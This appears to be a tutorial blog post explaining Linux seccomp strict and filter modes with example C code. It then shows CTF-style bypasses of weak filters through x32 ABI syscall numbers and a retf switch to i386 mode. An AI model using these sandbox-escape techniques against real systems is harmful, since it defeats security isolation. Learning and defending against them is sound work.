A Brief Introduction to Seccomp and How to Bypass It

Introduction

I have solved several seccomp-related challenges in the past few CTFs. To deepen my understanding of seccomp, I decided to take some time and learn how seccomp works.

All the code used in this post can be downloaded from here: seccomp.zip

Seccomp

So what is seccomp? "Seccomp is a computer security facility in the Linux kernel." [1]

Basically, seccomp creates a sandbox that limits a process's ability to use syscalls. Using seccomp, we can create an environment that allows or disallows specific syscalls.

The first version of seccomp was released in 2005. At that time, seccomp had only one mode: strict mode. In this mode, a process is only allowed to use four syscalls: read, write, exit and sigreturn. If it uses any syscall other than those four, the kernel terminates it immediately with SIGKILL. (This is not very useful on its own because it is so restrictive!)

Then, in 2012, the second version of seccomp was introduced. Seccomp now has a new mode called filter mode. In this mode, the user can specify which syscalls are allowed by supplying a program for the BPF (Berkeley Packet Filter) virtual machine.

seccomp.h

/* Valid values for seccomp.mode and prctl(PR_SET_SECCOMP, <mode>) */
#define SECCOMP_MODE_DISABLED 0 /* seccomp is not in use. */
#define SECCOMP_MODE_STRICT 1 /* uses hard-coded filter. */
#define SECCOMP_MODE_FILTER 2 /* uses user-supplied filter. */

Seccomp strict mode

Let's start with the basic mode of seccomp: strict mode.

To do that, we are going to use a syscall called prctl.

More details are on the prctl man page.

#include <sys/prctl.h>
int prctl(int option, unsigned long arg2, unsigned long arg3,
unsigned long arg4, unsigned long arg5);

prctl is a syscall that allows you to manipulate various aspects of the calling thread or process. There are a lot of options we can use. In the case of seccomp, we only need to focus on PR_GET_SECCOMP and PR_SET_SECCOMP.

To get the current seccomp mode, we can simply use prctl(PR_GET_SECCOMP).

To change the current seccomp mode, we need to use prctl(PR_SET_SECCOMP, mode, ...).

Here is an example program that uses seccomp strict mode:

// https://man7.org/linux/man-pages/man2/seccomp.2.html
#include <stdio.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <sys/syscall.h>
#include <unistd.h>

// demo of strict mode: only read(), write(), exit() and sigreturn() are allowed
int main() {
    char msg[] = "hello world1!\n";
    write(1, msg, sizeof(msg) - 1); // fd 1 is stdout
    printf("current mode %d, change to strict mode now...\n", prctl(PR_GET_SECCOMP));

    // two ways of calling prctl
    // prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);
    syscall(__NR_prctl, PR_SET_SECCOMP, SECCOMP_MODE_STRICT);

    // stdout was already set up by the first printf, so this one only needs write()
    printf("seccomp change to mode strict\n");
    // prctl is a syscall outside the allowed set, so the process is killed here
    printf("This line shouldn't appear; current mode %d\n", prctl(PR_GET_SECCOMP));
}

Output:

17:01:07 $ ./seccomp_strict 
hello world1!
current mode 0, change to strict mode now...
seccomp change to mode strict
Killed

As we can see, after we switch to strict mode, we can only use read, write, exit and sigreturn. If we try to use any other syscall, such as prctl, the kernel kills the program immediately.
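To see both outcomes side by side, here is a minimal sketch that runs the strict-mode experiment in a forked child so the parent can inspect how the child ended. The helper name run_strict_child is an illustration and is not part of seccomp.zip. It assumes a Linux kernel with seccomp enabled, and it relies on the fact that glibc's _exit() uses exit_group, which strict mode does not allow, so the child leaves through the raw exit syscall.

```c
#include <linux/seccomp.h>
#include <signal.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Hypothetical helper (not from the original post): fork a child, put it in
 * strict mode, and return the child's wait status to the caller.
 * If call_forbidden is nonzero, the child issues getpid, which is not one of
 * the four syscalls strict mode allows.
 */
int run_strict_child(int call_forbidden)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT) != 0)
            _exit(2); /* seccomp not available; still unrestricted here */

        static const char msg[] = "child: in strict mode\n";
        ssize_t n = write(STDOUT_FILENO, msg, sizeof(msg) - 1); /* allowed */
        (void)n;

        if (call_forbidden)
            syscall(SYS_getpid); /* the kernel delivers SIGKILL here */

        /* exit_group would be killed too, so use the raw exit syscall. */
        syscall(SYS_exit, 0);
    }

    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return status;
}
```

Calling run_strict_child(0) should give a status for which WIFEXITED is true, while run_strict_child(1) should give one for which WTERMSIG is SIGKILL, matching the "Killed" line in the output above.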

Seccomp BPF (filter mode)

As mentioned, filter mode lets the user supply a BPF filter that restricts which syscalls may be used. So before talking about seccomp filters, let's talk about BPF first.

BPF was initially used at the data link layer, allowing users to run small programs efficiently inside the kernel. So users can use BPF to process data packets, for example to filter them. Later, BPF was also adopted in other places.

Seccomp filter mode also uses a BPF virtual machine for syscall filtering.

To do that, we need to write a small program and load it into the kernel. Note that the loading process is irreversible: once you have loaded your BPF filter into the kernel, you cannot modify or remove it.

A BPF program is described by sock_fprog. This struct has a len field holding the total number of instructions and a pointer to an array of instructions.

struct sock_fprog {	/* Required for SO_ATTACH_FILTER. */
unsigned short len; /* Number of filter blocks */
struct sock_filter __user *filter;
};

Each instruction is described by sock_filter. Different instruction codes perform different operations.

struct sock_filter {	/* Filter block */
__u16 code; /* Actual filter code */
__u8 jt; /* Jump true */
__u8 jf; /* Jump false */
__u32 k; /* Generic multiuse field */
};

sock_fprog and sock_filter are defined in filter.h. A detailed explanation can also be found in the header file.

BPF instructions include basic load, store, arithmetic operations, jumps (conditional and unconditional), and return.

All of these instructions can be found in bpf_common.h.

When writing a BPF program, we can use two macros (BPF_STMT and BPF_JUMP) to simplify our code.

filter.h

#ifndef BPF_STMT
#define BPF_STMT(code, k) { (unsigned short)(code), 0, 0, k }
#endif
#ifndef BPF_JUMP
#define BPF_JUMP(code, k, jt, jf) { (unsigned short)(code), jt, jf, k }
#endif

BPF_STMT is used for instructions that do not branch, such as loading a register or returning a value. It takes two parameters: the first is the BPF instruction code and the second is the value (k).

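// load nr (the syscall number) into the accumulator
BPF_STMT(BPF_LD | BPF_W | BPF_ABS | BPF_K,(offsetof(struct seccomp_data, nr)))

BPF_LD means load a value into the accumulator (the internal register A), BPF_W means the value is a 32-bit word, and BPF_ABS means it is read from seccomp_data at the absolute offset given by the second argument. BPF_K has the value 0, so it changes nothing here and can be omitted.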

BPF_STMT(BPF_RET | BPF_K,SECCOMP_RET_KILL)

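This returns SECCOMP_RET_KILL, which tells the kernel to kill the caller instead of running the syscall.

BPF_JUMP is used to build the control flow of our mini program. It takes four arguments: the instruction code, the value to compare against, the jump offset if the comparison is true, and the jump offset if it is false.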

BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K ,__NR_execve , 0, 2)

This statement means: if the value in the accumulator is equal to __NR_execve, skip the next jt=0 instructions (that is, simply continue with the next instruction). If they are not equal, skip the next jf=2 instructions.
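To make the relative jump offsets concrete, here is a minimal sketch of a userspace evaluator for the handful of classic BPF opcodes that appear in this post. It is only an illustration and not the kernel's interpreter: eval_filter, demo_filter and DEMO_NR_OPEN are hypothetical names, DEMO_NR_OPEN is assumed to be 2 (the number of open on x86-64), and any opcode outside the supported subset is treated as KILL. The demo filter uses the same five-instruction layout as seccomp_filter.c later in this post.

```c
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define DEMO_NR_OPEN 2 /* assumption: __NR_open on x86-64 */

/* Same shape as the filter in seccomp_filter.c. */
const struct sock_filter demo_filter[] = {
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, DEMO_NR_OPEN, 0, 2),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_TRACE),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};

/* Hypothetical helper: run a filter against one seccomp_data record. */
uint32_t eval_filter(const struct sock_filter *prog, size_t len,
                     const struct seccomp_data *data)
{
    uint32_t acc = 0; /* the accumulator, "A" in seccomp-tools output */

    for (size_t pc = 0; pc < len; pc++) {
        const struct sock_filter *ins = &prog[pc];

        switch (ins->code) {
        case BPF_LD | BPF_W | BPF_ABS: /* A = 32-bit word at offset k */
            if (ins->k + sizeof(acc) > sizeof(*data))
                return SECCOMP_RET_KILL;
            memcpy(&acc, (const char *)data + ins->k, sizeof(acc));
            break;
        case BPF_JMP | BPF_JEQ | BPF_K: /* offsets count from the next instruction */
            pc += (acc == ins->k) ? ins->jt : ins->jf;
            break;
        case BPF_JMP | BPF_JGE | BPF_K:
            pc += (acc >= ins->k) ? ins->jt : ins->jf;
            break;
        case BPF_RET | BPF_K: /* the filter's verdict */
            return ins->k;
        default: /* outside the subset this sketch understands */
            return SECCOMP_RET_KILL;
        }
    }
    return SECCOMP_RET_KILL; /* ran off the end without a return */
}
```

With nr set to DEMO_NR_OPEN the jump takes jt=0 and falls into the KILL return; with any other number it takes jf=2 and lands on the ALLOW return, skipping both KILL and TRACE.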

After we fill in the sock_fprog struct, we can load our program into the kernel using prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog).

One thing to mention is that we must first set no_new_privs with prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0); otherwise, installing the filter fails unless the process has CAP_SYS_ADMIN.

Let's look at an example that tries to print out the flag for us.

seccomp_filter.c

// https://man7.org/linux/man-pages/man2/seccomp.2.html
#include <linux/seccomp.h> /* Definition of SECCOMP_* constants */
#include <linux/filter.h> /* Definition of struct sock_fprog */
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stddef.h>
#include <fcntl.h>

// demo of filter mode: open is not allowed
int main() {
    char msg[] = "hello world1!\n";
    write(1, msg, sizeof(msg) - 1); // fd 1 is stdout
    printf("current mode %d, change to filter mode now...\n", prctl(PR_GET_SECCOMP));

    // no_new_privs must be set to 1, otherwise SECCOMP_MODE_FILTER fails
    // for a process without CAP_SYS_ADMIN.
    // https://man7.org/linux/man-pages/man2/seccomp.2.html
    prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);

    struct sock_filter filter[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, nr))), // A = syscall number
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_open, 0, 2), // if A == open, fall through to kill; else skip 2 instructions to allow
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),  // return kill
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_TRACE), // return trace (never reached)
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), // return allow
    };

    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof(filter) / sizeof(filter[0])),
        .filter = filter,
    };

    printf("set mode return %d\n", prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog));
    printf("seccomp change to mode filter\n");

    // open is blocked by the filter, so the process is killed here
    int fd = syscall(__NR_open, "flag.txt", O_RDONLY);

    // the rest of the program won't execute
    char flag[23];
    read(fd, flag, 23);
    write(1, flag, 23);
}

Output:

hello world1!
current mode 0, change to filter mode now...
set mode return 0
seccomp change to mode filter
Bad system call

We can see that seccomp successfully stops the open syscall from executing!

We can also validate our seccomp filter using a tool called seccomp-tools.

17:06:17 $ seccomp-tools dump ./seccomp_filter
hello world1!
current mode 0, change to filter mode now...
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000000 A = sys_number
0001: 0x15 0x00 0x02 0x00000002 if (A != open) goto 0004
0002: 0x06 0x00 0x00 0x00000000 return KILL
0003: 0x06 0x00 0x00 0x7ff00000 return TRACE
0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW
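The CODE, JT, JF and K columns in that dump are simply the four fields of each sock_filter. As a rough sketch of how to read them, the block below rebuilds the same five instructions with the macros and prints their raw fields. The names dumped and print_raw are illustrative, and the literal 2 stands in for __NR_open on x86-64.

```c
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <stdio.h>

/* The five instructions from the dump; 2 is assumed to be __NR_open (x86-64). */
const struct sock_filter dumped[] = {
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, 2, 0, 2),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_TRACE),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};

/* Hypothetical helper: print index, code, jt, jf and k for each instruction. */
void print_raw(const struct sock_filter *f, size_t n)
{
    for (size_t i = 0; i < n; i++)
        printf("%04zu: 0x%02x 0x%02x 0x%02x 0x%08x\n", i,
               (unsigned)f[i].code, (unsigned)f[i].jt,
               (unsigned)f[i].jf, (unsigned)f[i].k);
}
```

Here 0x20 is BPF_LD | BPF_W | BPF_ABS, 0x15 is BPF_JMP | BPF_JEQ | BPF_K, and 0x06 is BPF_RET | BPF_K, while the K values 0x7ff00000 and 0x7fff0000 are SECCOMP_RET_TRACE and SECCOMP_RET_ALLOW.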

Common strategies in CTF

Now let's try to bypass our seccomp restriction.

Seccomp with no x32 ABI check

Here is our code from the previous example (see seccomp_filter_no_x32_abi_check.c).


Is there any way we can bypass that? The answer is yes. Because the filter only matches the x86-64 syscall number for open, the x32 variant of the same syscall is not restricted!

We can still use x32 ABI syscalls.

Therefore, if we set the x32 syscall flag bit (__X32_SYSCALL_BIT) in our syscall number, we can use our system call again!

We replace the syscall number for open with __NR_open|__X32_SYSCALL_BIT.

seccomp_filter_no_x32_abi_check_bypass.c

// https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl
// only works for syscalls marked "common" in the table above
// use the x32 ABI to bypass the filter :)
// 0x2 | 0x40000000 = 0x40000002
int fd = syscall(__NR_open|__X32_SYSCALL_BIT,"flag.txt",O_RDONLY);
printf("why open works????????????????\n");

Execute our program again, and we get the flag!
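The arithmetic behind this bypass is small enough to check by hand. The sketch below mirrors the filter's single equality test in plain C. The constants are assumed values for x86-64 Linux, and the helper names are made up for illustration.

```c
#include <stdint.h>

/* Assumed values for x86-64 Linux; the kernel headers define them as
 * __NR_open and __X32_SYSCALL_BIT. */
#define DEMO_NR_OPEN 2u
#define DEMO_X32_BIT 0x40000000u

/* Hypothetical helper: the syscall number an x32 caller would pass. */
uint32_t x32_number(uint32_t nr)
{
    return nr | DEMO_X32_BIT;
}

/* Mirrors the filter's only test: BPF_JEQ against the plain open number. */
int filter_would_kill(uint32_t nr)
{
    return nr == DEMO_NR_OPEN;
}
```

x32_number(DEMO_NR_OPEN) is 0x40000002, which is not equal to 2, so the JEQ comparison fails and the filter falls through to ALLOW.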


Seccomp with no arch check

To prevent the user from making x32 ABI calls, we add another restriction: check whether the syscall number is greater than or equal to 0x40000000 (__X32_SYSCALL_BIT).

BPF_JUMP(BPF_JMP | BPF_JGE| BPF_K,__X32_SYSCALL_BIT,1,0),

seccomp_filter_no_arch_check.c

Output of seccomp-tools:

17:48:35 $ seccomp-tools dump ./seccomp_filter_no_arch_check
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000000 A = sys_number
0001: 0x35 0x01 0x00 0x40000000 if (A >= 0x40000000) goto 0003
0002: 0x15 0x00 0x02 0x00000002 if (A != open) goto 0005
0003: 0x06 0x00 0x00 0x00000000 return KILL
0004: 0x06 0x00 0x00 0x7ff00000 return TRACE
0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW

Now the previous method won't work: if our syscall number is greater than or equal to 0x40000000, the filter returns KILL and the program stops executing.

But in this example, our rule doesn't check the architecture, so i386 syscalls are not handled. We can use retf to switch to 32-bit mode and then make the syscall through the i386 ABI, where open has a different syscall number (5 instead of 2).

Here is the shellcode we can use to switch to i386 code execution.

  1. xor the return address with 0x2300000000 so that the code segment selector becomes 0x23 (32-bit mode)
  2. push the resulting value onto the stack
  3. execute retf
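Step 1 can be sketched as plain arithmetic. The helper below, whose name is hypothetical, builds the 8-byte value that is pushed before retf. It assumes the target address fits in 32 bits, and that retf with its default operand size in 64-bit mode pops a 4-byte offset followed by a 4-byte slot holding the code segment selector. 0x23 is the selector Linux uses for 32-bit user code on x86-64.

```c
#include <stdint.h>

#define USER32_CS 0x23u /* 32-bit user code segment selector on x86-64 Linux */

/*
 * Hypothetical helper: combine a 32-bit target address with the 32-bit code
 * segment selector. The low dword becomes EIP and the high dword becomes CS
 * when retf pops the value.
 */
uint64_t far_return_frame(uint32_t target32)
{
    return ((uint64_t)USER32_CS << 32) ^ target32;
}
```

Because the upper 32 bits of the address are zero, xor and or give the same result here. For example, a target of 0x401000 becomes 0x2300401000.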

The full exploit can be found in seccomp_filter_no_arch_check_bypass.c.

Result

17:57:59 $ ./seccomp_filter_no_arch_check_bypass
hello world1!
current mode 0, change to filter mode now...
set mode return 0
seccomp change to mode filter
now you can't use open lol
flag{here_is_the_flag}
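For contrast, a filter that closes both holes would typically check seccomp_data.arch before it looks at the syscall number. The following is a sketch under stated assumptions and is not code from seccomp.zip: hardened_filter and hardened_prog are illustrative names, the literal 2 stands in for __NR_open on x86-64, and AUDIT_ARCH_X86_64 comes from linux/audit.h.

```c
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>

#define DEMO_X32_BIT 0x40000000u /* value of __X32_SYSCALL_BIT */
#define DEMO_NR_OPEN 2           /* assumption: __NR_open on x86-64 */

struct sock_filter hardened_filter[] = {
    /* 0: A = arch */
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
    /* 1: arch == x86-64 ? continue at 2 : skip 3 instructions to KILL at 5 */
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 3),
    /* 2: A = syscall number */
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    /* 3: nr >= x32 bit ? skip 1 instruction to KILL at 5 : continue at 4 */
    BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, DEMO_X32_BIT, 1, 0),
    /* 4: nr == open ? fall through to KILL at 5 : skip 1 to ALLOW at 6 */
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, DEMO_NR_OPEN, 0, 1),
    /* 5 */
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    /* 6 */
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};

/* Hypothetical helper: wrap the array in the struct that prctl expects. */
struct sock_fprog hardened_prog(void)
{
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof(hardened_filter) /
                                sizeof(hardened_filter[0])),
        .filter = hardened_filter,
    };
    return prog;
}
```

With a check like this in place, a syscall made through the i386 entry point reports a different arch value and is killed before its number is ever compared. Blocking only open is still a weak policy, since other syscalls such as openat remain available.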

Other

TBD

Reference

  1. https://en.wikipedia.org/wiki/Seccomp
  2. https://xz.aliyun.com/t/11480
  3. https://n132.github.io/2022/07/04/S2.html
  4. https://tripoloski1337.github.io/ctf/2021/07/12/bypassing-seccomp-prctl.html
  5. http://blog.redrocket.club/2019/04/11/midnightsunctf-quals-2019-gissa2/